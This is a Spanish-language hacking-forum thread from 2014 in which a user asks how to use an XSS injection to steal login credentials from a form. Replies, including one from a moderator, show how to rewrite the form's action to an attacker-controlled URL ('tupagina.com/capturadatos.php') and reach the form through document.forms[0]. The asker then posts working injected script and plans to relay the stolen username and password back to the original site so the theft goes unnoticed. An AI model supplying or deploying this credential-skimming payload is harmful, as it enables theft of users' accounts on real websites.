elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  ¿Como se puede robar post o get desde javascript?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Como se puede robar post o get desde javascript?  (Leído 4,408 veces)
Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
¿Como se puede robar post o get desde javascript?
« en: 21 Noviembre 2014, 14:26 pm »

¿Como se puede obtener post o get de un form desde un javascript y enviar estos a mi servidor?

Pongamos que hago una inyección XSS en una web donde esta el form de login, ¿se podría hacer que envíe el user y pass a mi servidor, o simplemente no se puede?
En línea

T. Collins

Desconectado Desconectado

Mensajes: 206


Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #1 en: 21 Noviembre 2014, 14:32 pm »

Si como dices, puedes ejecutar javascript, claro que se puede. Por ejemplo, la forma más simple y cantosa es cambiar el action del form.
« Última modificación: 21 Noviembre 2014, 14:42 pm por T. Collins » En línea

Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #2 en: 21 Noviembre 2014, 14:59 pm »

¿Un pequeño ejemplo?
En línea

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #3 en: 21 Noviembre 2014, 15:05 pm »

es simplemente cambiar el action del form :P

es decir
si el form originalmente es
Código
  1. <form method="POST" action="/paginadatos.php">
haces un jscript que lo cambie a
Código
  1. <form method="POST" action="http://tupagina.com/capturadatos.php">

si tienes dudas sobre como hacerlo recomiendo leer un tutorial sobre jscript completo que toque manipulación del DOM :P
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #4 en: 21 Noviembre 2014, 17:16 pm »

He conseguido hacerlo
Código:
<form action="" method="post" name="nombre_form">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código supuestamente inyectado
<script>
document.nombre_form.action = 'obtener_datos.php';
document.nombre_form.submit();
</script>

luego solo hace falta un obtener_datos.php que recoja las variables y las envié otra vez al servidor inicial pero que pasa si el form no tiene la variable name.
En línea

T. Collins

Desconectado Desconectado

Mensajes: 206


Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #5 en: 21 Noviembre 2014, 17:48 pm »

Puedes acceder al form de distintas formas, como has puesto tú, con document.getElementById si tiene un id, con document.forms[] ....
En línea

Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #6 en: 21 Noviembre 2014, 17:52 pm »

Pongamos que tienes exactamente este form:
Código:
<form action="" method="post">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código a inyectar

como robarías las supuestas credenciales en este mismo form.
En línea

T. Collins

Desconectado Desconectado

Mensajes: 206


Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #7 en: 21 Noviembre 2014, 17:58 pm »

Si es el único o primer form de la página, document.forms[0]. En el navegador tienes una consola de javascript y puedes ir probando, además hay mucha información en internet sobre como hacer esto.
En línea

Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #8 en: 21 Noviembre 2014, 18:01 pm »

Pues ya esta todo resuelto, gracias.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Post form, javascript y asp.net
Hacking
kamtraz 0 2,343 Último mensaje 7 Septiembre 2012, 23:19 pm
por kamtraz
¿Como se puede realizar una función en javascript al enviar un form?
Desarrollo Web
Varlch 5 3,184 Último mensaje 12 Diciembre 2014, 21:40 pm
por Varlch
Así es cómo tu lavadora de ropa puede robar los archivos de tu computadora
Noticias
wolfbcn 3 1,875 Último mensaje 6 Agosto 2015, 20:43 pm
por alkage
Como puede hacer javascript sincronico
Desarrollo Web
yoelrodguez 4 2,328 Último mensaje 28 Marzo 2017, 00:31 am
por yoelrodguez
[Resuelto] Como modificar el CSS desde javascript.
Desarrollo Web
zellion 6 2,810 Último mensaje 30 Agosto 2019, 00:35 am
por zellion
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines